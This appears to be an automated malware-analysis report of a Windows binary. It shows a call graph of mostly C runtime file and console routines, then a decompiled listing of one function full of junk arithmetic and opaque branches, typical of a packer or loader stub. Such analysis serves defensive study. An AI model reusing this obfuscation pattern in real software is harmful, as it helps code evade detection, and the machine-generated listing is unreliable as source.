10e432e 10226->10229 10230 10d9826 _free 20 API calls 10227->10230 10409 10e42a2 10228->10409 10232 10d9826 _free 20 API calls 10229->10232 10234 10e3e00 10230->10234 10233 10e4336 10232->10233 10235 10d976a _abort 26 API calls 10233->10235 10234->10197 10234->10204 10235->10234 10237 10e37bd ___scrt_is_nonwritable_in_current_image 10236->10237 10238 10e37dd 10237->10238 10239 10e37c5 10237->10239 10241 10e387b 10238->10241 10245 10e3812 10238->10245 10261 10d9813 10239->10261 10243 10d9813 __dosmaperr 20 API calls 10241->10243 10244 10e3880 10243->10244 10247 10d9826 _free 20 API calls 10244->10247 10264 10e1eb0 EnterCriticalSection 10245->10264 10246 10d9826 _free 20 API calls 10257 10e37d2 ___scrt_is_nonwritable_in_current_image 10246->10257 10249 10e3888 10247->10249 10251 10d976a _abort 26 API calls 10249->10251 10250 10e3818 10252 10e3849 10250->10252 10253 10e3834 10250->10253 10251->10257 10265 10e389c 10252->10265 10254 10d9826 _free 20 API calls 10253->10254 10256 10e3839 10254->10256 10259 10d9813 __dosmaperr 20 API calls 10256->10259 10257->10213 10258 10e3844 10316 10e3873 10258->10316 10259->10258 10262 10d9cb4 _abort 20 API calls 10261->10262 10263 10d9818 10262->10263 10263->10246 10264->10250 10266 10e38ca 10265->10266 10267 10e38c3 10265->10267 10268 10e38ce 10266->10268 10269 10e38ed 10266->10269 10271 10ddc5f _ValidateLocalCookies 5 API calls 10267->10271 10270 10d9813 __dosmaperr 20 API calls 10268->10270 10273 10e393e 10269->10273 10274 10e3921 10269->10274 10272 10e38d3 10270->10272 10275 10e3aa4 10271->10275 10276 10d9826 _free 20 API calls 10272->10276 10277 10e3954 10273->10277 10319 10e3d9b 10273->10319 10278 10d9813 __dosmaperr 20 API calls 10274->10278 10275->10258 10279 10e38da 10276->10279 10322 10e3441 10277->10322 10282 10e3926 10278->10282 10283 10d976a _abort 26 API calls 10279->10283 10285 10d9826 _free 20 API calls 10282->10285 10283->10267 10288 10e392e 10285->10288 10286 10e399b 10289 10e39af 10286->10289 10290 10e39f5 WriteFile 10286->10290 10287 10e3962 10291 10e3988 10287->10291 10292 10e3966 10287->10292 10293 10d976a _abort 26 API calls 10288->10293 10294 10e39b7 10289->10294 10295 10e39e5 10289->10295 10297 10e3a18 GetLastError 10290->10297 10299 10e397e 10290->10299 10334 10e3221 GetConsoleCP 10291->10334 10296 10e3a5c 10292->10296 10329 10e33d4 10292->10329 10293->10267 10300 10e39bc 10294->10300 10301 10e39d5 10294->10301 10360 10e34b7 10295->10360 10296->10267 10304 10d9826 _free 20 API calls 10296->10304 10297->10299 10299->10267 10299->10296 10307 10e3a38 10299->10307 10300->10296 10345 10e3596 10300->10345 10352 10e3684 10301->10352 10306 10e3a81 10304->10306 10309 10d9813 __dosmaperr 20 API calls 10306->10309 10310 10e3a3f 10307->10310 10311 10e3a53 10307->10311 10309->10267 10312 10d9826 _free 20 API calls 10310->10312 10367 10d97f0 10311->10367 10314 10e3a44 10312->10314 10315 10d9813 __dosmaperr 20 API calls 10314->10315 10315->10267 10408 10e1ed3 LeaveCriticalSection 10316->10408 10318 10e3879 10318->10257 10372 10e3d1d 10319->10372 10394 10e2e30 10322->10394 10324 10e3456 10324->10286 10324->10287 10325 10e3451 10325->10324 10326 10d9c30 ___FrameUnwindToState 47 API calls 10325->10326 10327 10e3479 10326->10327 10327->10324 10328 10e3497 GetConsoleMode 10327->10328 10328->10324 10330 10e33f9 10329->10330 10333 10e342e 10329->10333 10331 10e3430 GetLastError 10330->10331 10332 10e3f11 WriteConsoleW CreateFileW 10330->10332 10330->10333 10331->10333 10332->10330 10333->10299 10335 10e3396 10334->10335 10339 10e3284 10334->10339 10336 10ddc5f _ValidateLocalCookies 5 API calls 10335->10336 10337 10e33d0 10336->10337 10337->10299 10339->10335 10340 10e330a WideCharToMultiByte 10339->10340 10341 10e27f0 49 API calls __fassign 10339->10341 10344 10e3361 WriteFile 10339->10344 10403 10d9839 10339->10403 10340->10335 10342 10e3330 WriteFile 10340->10342 10341->10339 10342->10339 10343 10e33b9 GetLastError 10342->10343 10343->10335 10344->10339 10344->10343 10347 10e35a5 10345->10347 10346 10e3667 10349 10ddc5f _ValidateLocalCookies 5 API calls 10346->10349 10347->10346 10348 10e3623 WriteFile 10347->10348 10348->10347 10350 10e3669 GetLastError 10348->10350 10351 10e3680 10349->10351 10350->10346 10351->10299 10354 10e3693 10352->10354 10353 10e379e 10355 10ddc5f _ValidateLocalCookies 5 API calls 10353->10355 10354->10353 10356 10e3715 WideCharToMultiByte 10354->10356 10358 10e374a WriteFile 10354->10358 10357 10e37ad 10355->10357 10356->10358 10359 10e3796 GetLastError 10356->10359 10357->10299 10358->10354 10358->10359 10359->10353 10365 10e34c6 10360->10365 10361 10e3579 10362 10ddc5f _ValidateLocalCookies 5 API calls 10361->10362 10364 10e3592 10362->10364 10363 10e3538 WriteFile 10363->10365 10366 10e357b GetLastError 10363->10366 10364->10299 10365->10361 10365->10363 10366->10361 10368 10d9813 __dosmaperr 20 API calls 10367->10368 10369 10d97fb _free 10368->10369 10370 10d9826 _free 20 API calls 10369->10370 10371 10d980e 10370->10371 10371->10267 10381 10e1f87 10372->10381 10374 10e3d2f 10375 10e3d48 SetFilePointerEx 10374->10375 10376 10e3d37 10374->10376 10378 10e3d60 GetLastError 10375->10378 10379 10e3d3c 10375->10379 10377 10d9826 _free 20 API calls 10376->10377 10377->10379 10380 10d97f0 __dosmaperr 20 API calls 10378->10380 10379->10277 10380->10379 10382 10e1f94 10381->10382 10383 10e1fa9 10381->10383 10384 10d9813 __dosmaperr 20 API calls 10382->10384 10386 10d9813 __dosmaperr 20 API calls 10383->10386 10388 10e1fce 10383->10388 10385 10e1f99 10384->10385 10387 10d9826 _free 20 API calls 10385->10387 10389 10e1fd9 10386->10389 10390 10e1fa1 10387->10390 10388->10374 10391 10d9826 _free 20 API calls 10389->10391 10390->10374 10392 10e1fe1 10391->10392 10393 10d976a _abort 26 API calls 10392->10393 10393->10390 10395 10e2e3d 10394->10395 10396 10e2e4a 10394->10396 10397 10d9826 _free 20 API calls 10395->10397 10398 10e2e56 10396->10398 10399 10d9826 _free 20 API calls 10396->10399 10400 10e2e42 10397->10400 10398->10325 10401 10e2e77 10399->10401 10400->10325 10402 10d976a _abort 26 API calls 10401->10402 10402->10400 10404 10d9c30 ___FrameUnwindToState 47 API calls 10403->10404 10405 10d9844 10404->10405 10406 10d9d7f __fassign 47 API calls 10405->10406 10407 10d9854 10406->10407 10407->10339 10408->10318 10412 10e4220 10409->10412 10411 10e42c6 10411->10234 10413 10e422c ___scrt_is_nonwritable_in_current_image 10412->10413 10423 10e1eb0 EnterCriticalSection 10413->10423 10415 10e423a 10416 10e426c 10415->10416 10417 10e4261 10415->10417 10418 10d9826 _free 20 API calls 10416->10418 10424 10e4349 10417->10424 10420 10e4267 10418->10420 10439 10e4296 10420->10439 10422 10e4289 ___scrt_is_nonwritable_in_current_image 10422->10411 10423->10415 10425 10e1f87 26 API calls 10424->10425 10426 10e4359 10425->10426 10427 10e435f 10426->10427 10429 10e4391 10426->10429 10432 10e1f87 26 API calls 10426->10432 10442 10e1ef6 10427->10442 10429->10427 10430 10e1f87 26 API calls 10429->10430 10433 10e439d CloseHandle 10430->10433 10435 10e4388 10432->10435 10433->10427 10436 10e43a9 GetLastError 10433->10436 10434 10e43d9 10434->10420 10438 10e1f87 26 API calls 10435->10438 10436->10427 10437 10d97f0 __dosmaperr 20 API calls 10437->10434 10438->10429 10451 10e1ed3 LeaveCriticalSection 10439->10451 10441 10e42a0 10441->10422 10443 10e1f6c 10442->10443 10444 10e1f05 10442->10444 10445 10d9826 _free 20 API calls 10443->10445 10444->10443 10450 10e1f2f 10444->10450 10446 10e1f71 10445->10446 10447 10d9813 __dosmaperr 20 API calls 10446->10447 10448 10e1f5c 10447->10448 10448->10434 10448->10437 10449 10e1f56 SetStdHandle 10449->10448 10450->10448 10450->10449 10451->10441 10452->10207 10453->10187 9948 10dc87a 9951 10db4ba 9948->9951 9952 10db4cc 9951->9952 9953 10db4c3 9951->9953 9953->9952 9954 10db3b9 61 API calls 9953->9954 9954->9952

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                                    			E010D1F80() {
                                                                                                                                                                                                                                                    				intOrPtr _t287;
                                                                                                                                                                                                                                                    				intOrPtr _t302;
                                                                                                                                                                                                                                                    				intOrPtr _t303;
                                                                                                                                                                                                                                                    				int _t309;
                                                                                                                                                                                                                                                    				intOrPtr _t322;
                                                                                                                                                                                                                                                    				signed int _t325;
                                                                                                                                                                                                                                                    				signed int _t327;
                                                                                                                                                                                                                                                    				signed int _t344;
                                                                                                                                                                                                                                                    				intOrPtr _t345;
                                                                                                                                                                                                                                                    				intOrPtr _t348;
                                                                                                                                                                                                                                                    				intOrPtr _t356;
                                                                                                                                                                                                                                                    				signed int _t394;
                                                                                                                                                                                                                                                    				signed int _t398;
                                                                                                                                                                                                                                                    				intOrPtr _t402;
                                                                                                                                                                                                                                                    				intOrPtr _t413;
                                                                                                                                                                                                                                                    				signed int _t437;
                                                                                                                                                                                                                                                    				intOrPtr _t452;
                                                                                                                                                                                                                                                    				signed int _t458;
                                                                                                                                                                                                                                                    				intOrPtr _t466;
                                                                                                                                                                                                                                                    				intOrPtr _t468;
                                                                                                                                                                                                                                                    				intOrPtr _t482;
                                                                                                                                                                                                                                                    				int* _t486;
                                                                                                                                                                                                                                                    				intOrPtr _t487;
                                                                                                                                                                                                                                                    				intOrPtr _t519;
                                                                                                                                                                                                                                                    				intOrPtr* _t520;
                                                                                                                                                                                                                                                    				void* _t521;
                                                                                                                                                                                                                                                    				void* _t522;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t520 = _t521 - 0x68;
                                                                                                                                                                                                                                                    				_t522 = _t521 - 0xc0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t520 + 0x64)) = 0x116d5f0;
                                                                                                                                                                                                                                                    				 *( *((intOrPtr*)(_t520 + 0x64)) + 0xf8) =  *(_t520 + 0x78);
                                                                                                                                                                                                                                                    				 *(_t520 + 0x58) = 0x2565;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x4c) = 0x24c7;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x5c) = 0x2506;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x60) = 0x2622;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x54) = 0x24c7;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x50) = 0x2565;
                                                                                                                                                                                                                                                    				if( *(_t520 + 0x54) < ( *(_t520 + 0x50) ^ 0x00000347)) {
                                                                                                                                                                                                                                                    					if( *(_t520 + 0x58) >  *(_t520 + 0x4c) + 0x161) {
                                                                                                                                                                                                                                                    						__eflags =  *(_t520 + 0x58) - ( *(_t520 + 0x5c) ^  *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadc71)) -  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc);
                                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                                    							__eflags =  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc) -  *(_t520 + 0x4c) *  *0x0116D694 *  *0x116d62c;
                                                                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                                                                    								 *(_t520 + 0x18) =  *(_t520 + 0x5c) *  *( *((intOrPtr*)(_t520 + 0x64)) + 0x8c);
                                                                                                                                                                                                                                                    								GetModuleHandleA( *(_t520 + 0x18));
                                                                                                                                                                                                                                                    								 *(_t520 + 4) =  *(_t520 + 0x60) -  *(_t520 + 0x60) ^ 0x00002801;
                                                                                                                                                                                                                                                    								 *(_t520 + 8) =  *(_t520 + 0x5c) *  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf4);
                                                                                                                                                                                                                                                    								_t322 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    								 *(_t520 + 0xc) = ( *(_t520 + 0x60) | 0x000024c7) *  *(_t322 + 0xbadc81);
                                                                                                                                                                                                                                                    								_t413 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t520 + 0x10)) = _t413;
                                                                                                                                                                                                                                                    								_t325 =  *( *((intOrPtr*)(_t520 + 0x64)) + 0x8c) &  *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadbc1);
                                                                                                                                                                                                                                                    								__eflags = _t325;
                                                                                                                                                                                                                                                    								 *(_t520 + 0x14) = _t325;
                                                                                                                                                                                                                                                    								_t327 = E010E8570( *(_t520 + 4),  *(_t520 + 8),  *(_t520 + 0xc),  *((intOrPtr*)(_t520 + 0x10)),  *(_t520 + 0x14));
                                                                                                                                                                                                                                                    								_t522 = _t522 + 0x14;
                                                                                                                                                                                                                                                    								 *(_t520 + 0x5c) = _t327;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x0000003d;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x4c) =  *(_t520 + 0x4c) ^ 0x000002ef;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x60) =  *(_t520 + 0x60) + 0x218;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x54) =  *(_t520 + 0x54) + 0x161;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x000002ad;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x34)) =  *(_t520 + 0x50) + 0x254;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x38)) =  *(_t520 + 0x58) - 0x2a;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x3c)) =  *(_t520 + 0x4c) - 0xc3;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x40)) =  *(_t520 + 0x58) + 0x2d5;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x44)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                    						 *(_t520 + 0x48) =  *(_t520 + 0x54) ^ 0x000000af;
                                                                                                                                                                                                                                                    						_push( *(_t520 + 0x48));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x44)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x40)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x3c)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x38)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x34)));
                                                                                                                                                                                                                                                    						 *(_t520 + 0x60) = E010D3690();
                                                                                                                                                                                                                                                    						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x000001a5;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x1c)) =  *(_t520 + 0x60) - 0xbd;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x20) =  *(_t520 + 0x54) ^ 0x000003b0;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x24)) =  *(_t520 + 0x54) + 0xac;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x28)) =  *(_t520 + 0x5c) - 0x9b;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x2c)) =  *(_t520 + 0x58) - 0x5f;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x30)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x30)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x2c)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x28)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x24)));
                                                                                                                                                                                                                                                    						_push( *(_t520 + 0x20));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x1c)));
                                                                                                                                                                                                                                                    						_t344 = E010D3E70();
                                                                                                                                                                                                                                                    						_t522 = _t522 + 0x30;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x58) = _t344;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x54) =  *(_t520 + 0x54) - 0x161;
                                                                                                                                                                                                                                                    						_t519 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t345 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t68 = _t345 + 0x94; // 0xd02000
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t519 + 0x90)) =  *_t68;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *(_t520 + 0x54) > ( *(_t520 + 0x58) ^ 0x00000d01)) {
                                                                                                                                                                                                                                                    					_t437 =  *0x116d628; // 0x1
                                                                                                                                                                                                                                                    					 *(_t520 - 0x38) = _t437 &  *( *((intOrPtr*)(_t520 + 0x64)) + 0xac);
                                                                                                                                                                                                                                                    					CloseHandle( *(_t520 - 0x38));
                                                                                                                                                                                                                                                    					_t348 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t202 = _t348 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    					 *(_t520 + 0x50) =  *(_t520 + 0x50) -  *_t202 +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xb4));
                                                                                                                                                                                                                                                    					 *(_t520 + 0x50) =  *(_t520 + 0x50) |  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc) *  *0x0116D694 -  *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0);
                                                                                                                                                                                                                                                    					GetCurrentProcessId();
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x40)) = 0x28ec;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x3c)) = 0x3c28;
                                                                                                                                                                                                                                                    					 *0x116df10 = E010E5FF0(__eflags,  *((intOrPtr*)(_t520 - 0x40)),  *((intOrPtr*)(_t520 - 0x3c)));
                                                                                                                                                                                                                                                    					 *(_t520 - 0x58) =  *(_t520 + 0x54) &  *0x01D1B1DD;
                                                                                                                                                                                                                                                    					_t356 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t222 = _t356 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                    					 *(_t520 - 0x54) =  *(_t520 + 0x60) +  *_t222;
                                                                                                                                                                                                                                                    					 *(_t520 - 0x50) =  *(_t520 + 0x50) * 0x26e5 *  *(_t520 + 0x60);
                                                                                                                                                                                                                                                    					 *(_t520 - 0x4c) =  *( *((intOrPtr*)(_t520 + 0x64)) + 0x14) ^ 0x000026d4;
                                                                                                                                                                                                                                                    					 *(_t520 - 0x48) =  *(_t520 + 0x50) +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xa4)) |  *(_t520 + 0x54);
                                                                                                                                                                                                                                                    					_t452 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t238 = _t452 + 0xb4; // 0x0
                                                                                                                                                                                                                                                    					 *(_t520 - 0x44) =  *_t238 *  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf4);
                                                                                                                                                                                                                                                    					MultiByteToWideChar( *(_t520 - 0x58),  *(_t520 - 0x54),  *(_t520 - 0x50),  *(_t520 - 0x4c),  *(_t520 - 0x48),  *(_t520 - 0x44));
                                                                                                                                                                                                                                                    					_t458 =  *(_t520 + 0x5c) | ( *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadc51) &  *0x116d6cc) - 0x000027b9;
                                                                                                                                                                                                                                                    					__eflags = _t458;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x5c) = _t458;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					 *(_t520 + 0x58) =  *(_t520 + 0x58) - 0x39;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x18)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x14)) =  *(_t520 + 0x60) + 6;
                                                                                                                                                                                                                                                    					 *(_t520 - 0x10) =  *(_t520 + 0x60) ^ 0x000003ba;
                                                                                                                                                                                                                                                    					 *(_t520 - 0xc) =  *(_t520 + 0x5c) ^ 0x0000001b;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 8)) =  *(_t520 + 0x58) - 0x2c6;
                                                                                                                                                                                                                                                    					 *(_t520 - 4) =  *(_t520 + 0x4c);
                                                                                                                                                                                                                                                    					 *_t520 =  *(_t520 + 0x50) + 0x16f;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x60) = E010E55C0( *((intOrPtr*)(_t520 - 0x18)),  *((intOrPtr*)(_t520 - 0x14)),  *(_t520 - 0x10),  *(_t520 - 0xc),  *((intOrPtr*)(_t520 - 8)),  *(_t520 - 4),  *_t520);
                                                                                                                                                                                                                                                    					 *(_t520 + 0x58) =  *(_t520 + 0x58) - 0x2c6;
                                                                                                                                                                                                                                                    					_t466 =  *0x116d69c; // 0x1a0e74
                                                                                                                                                                                                                                                    					_t287 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t136 = _t287 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                    					_t468 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t468 + 0x58)) =  *_t136 - _t466 - 0x1a0ed5;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x54) =  *(_t520 + 0x54) ^ 0x000002f4;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x60) =  *(_t520 + 0x60) - 0x3b;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x50) =  *(_t520 + 0x50) - 0x5f;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x34)) =  *(_t520 + 0x58) + 0xf8;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x30)) =  *(_t520 + 0x4c) - 0x90;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x2c)) =  *(_t520 + 0x5c) - 0xb;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x28)) =  *(_t520 + 0x60) + 0x254;
                                                                                                                                                                                                                                                    					 *(_t520 - 0x24) =  *(_t520 + 0x58) ^ 0x000003de;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x20)) =  *(_t520 + 0x54) - 0x93;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x1c)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                    					 *(_t520 + 0x5c) = E010E7440( *((intOrPtr*)(_t520 - 0x34)),  *((intOrPtr*)(_t520 - 0x30)),  *((intOrPtr*)(_t520 - 0x2c)),  *((intOrPtr*)(_t520 - 0x28)),  *(_t520 - 0x24),  *((intOrPtr*)(_t520 - 0x20)),  *((intOrPtr*)(_t520 - 0x1c)));
                                                                                                                                                                                                                                                    					 *(_t520 + 0x4c) =  *(_t520 + 0x4c) + 0xac;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x60) =  *(_t520 + 0x60) + 0xbd;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x38)) >=  *( *((intOrPtr*)(_t520 + 0x64)) + 0x14)) {
                                                                                                                                                                                                                                                    						_t302 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t178 = _t302 + 0xdc; // 0x8
                                                                                                                                                                                                                                                    						_t303 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t394 =  *_t178 +  *((intOrPtr*)(_t303 + 0x74)) ^  *0x116d6d0 ^  *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0);
                                                                                                                                                                                                                                                    						__eflags = _t394;
                                                                                                                                                                                                                                                    						 *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0) = _t394;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t487 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t176 = _t487 + 0x94; // 0xd02000
                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x64)) =  *_t176;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t482 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t187 = _t482 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x9c)) <=  *_t187) {
                                                                                                                                                                                                                                                    						_t398 = ( *( *((intOrPtr*)(_t520 + 0x64)) + 0xac) +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xbadbdd))) *  *0x116d67c;
                                                                                                                                                                                                                                                    						__eflags = _t398;
                                                                                                                                                                                                                                                    						 *0x116d67c = _t398;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t486 =  *0x116d6d8; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t309 = DdeInitializeA(_t486,  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x90)) +  *0x116d6e0,  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf8));
                                                                                                                                                                                                                                                    						_t402 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t402 + 0xc0) = _t309;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				ExitProcess( *( *((intOrPtr*)(_t520 + 0x64)) + 0xc0));
                                                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                                                    0x010d1f81
                                                                                                                                                                                                                                                    0x010d1f85
                                                                                                                                                                                                                                                    0x010d1f8b
                                                                                                                                                                                                                                                    0x010d1f98
                                                                                                                                                                                                                                                    0x010d1f9e
                                                                                                                                                                                                                                                    0x010d1fa5
                                                                                                                                                                                                                                                    0x010d1fac
                                                                                                                                                                                                                                                    0x010d1fb3
                                                                                                                                                                                                                                                    0x010d1fba
                                                                                                                                                                                                                                                    0x010d1fc1
                                                                                                                                                                                                                                                    0x010d1fd4
                                                                                                                                                                                                                                                    0x010d1fe5
                                                                                                                                                                                                                                                    0x010d2134
                                                                                                                                                                                                                                                    0x010d2137
                                                                                                                                                                                                                                                    0x010d2159
                                                                                                                                                                                                                                                    0x010d215f
                                                                                                                                                                                                                                                    0x010d2172
                                                                                                                                                                                                                                                    0x010d2179
                                                                                                                                                                                                                                                    0x010d218b
                                                                                                                                                                                                                                                    0x010d219b
                                                                                                                                                                                                                                                    0x010d21af
                                                                                                                                                                                                                                                    0x010d21bc
                                                                                                                                                                                                                                                    0x010d21bf
                                                                                                                                                                                                                                                    0x010d21c5
                                                                                                                                                                                                                                                    0x010d21dc
                                                                                                                                                                                                                                                    0x010d21dc
                                                                                                                                                                                                                                                    0x010d21e0
                                                                                                                                                                                                                                                    0x010d21f7
                                                                                                                                                                                                                                                    0x010d21fc
                                                                                                                                                                                                                                                    0x010d21ff
                                                                                                                                                                                                                                                    0x010d21ff
                                                                                                                                                                                                                                                    0x010d215f
                                                                                                                                                                                                                                                    0x010d1feb
                                                                                                                                                                                                                                                    0x010d1ff1
                                                                                                                                                                                                                                                    0x010d1ffd
                                                                                                                                                                                                                                                    0x010d2008
                                                                                                                                                                                                                                                    0x010d2014
                                                                                                                                                                                                                                                    0x010d2020
                                                                                                                                                                                                                                                    0x010d202b
                                                                                                                                                                                                                                                    0x010d2034
                                                                                                                                                                                                                                                    0x010d2040
                                                                                                                                                                                                                                                    0x010d204b
                                                                                                                                                                                                                                                    0x010d2051
                                                                                                                                                                                                                                                    0x010d205d
                                                                                                                                                                                                                                                    0x010d2063
                                                                                                                                                                                                                                                    0x010d2067
                                                                                                                                                                                                                                                    0x010d206b
                                                                                                                                                                                                                                                    0x010d206f
                                                                                                                                                                                                                                                    0x010d2073
                                                                                                                                                                                                                                                    0x010d2077
                                                                                                                                                                                                                                                    0x010d2080
                                                                                                                                                                                                                                                    0x010d208b
                                                                                                                                                                                                                                                    0x010d2097
                                                                                                                                                                                                                                                    0x010d20a3
                                                                                                                                                                                                                                                    0x010d20ae
                                                                                                                                                                                                                                                    0x010d20ba
                                                                                                                                                                                                                                                    0x010d20c3
                                                                                                                                                                                                                                                    0x010d20c9
                                                                                                                                                                                                                                                    0x010d20cf
                                                                                                                                                                                                                                                    0x010d20d3
                                                                                                                                                                                                                                                    0x010d20d7
                                                                                                                                                                                                                                                    0x010d20db
                                                                                                                                                                                                                                                    0x010d20df
                                                                                                                                                                                                                                                    0x010d20e3
                                                                                                                                                                                                                                                    0x010d20e4
                                                                                                                                                                                                                                                    0x010d20e9
                                                                                                                                                                                                                                                    0x010d20ec
                                                                                                                                                                                                                                                    0x010d20f8
                                                                                                                                                                                                                                                    0x010d20fb
                                                                                                                                                                                                                                                    0x010d2101
                                                                                                                                                                                                                                                    0x010d2106
                                                                                                                                                                                                                                                    0x010d210c
                                                                                                                                                                                                                                                    0x010d210c
                                                                                                                                                                                                                                                    0x010d1fe5
                                                                                                                                                                                                                                                    0x010d220d
                                                                                                                                                                                                                                                    0x010d242b
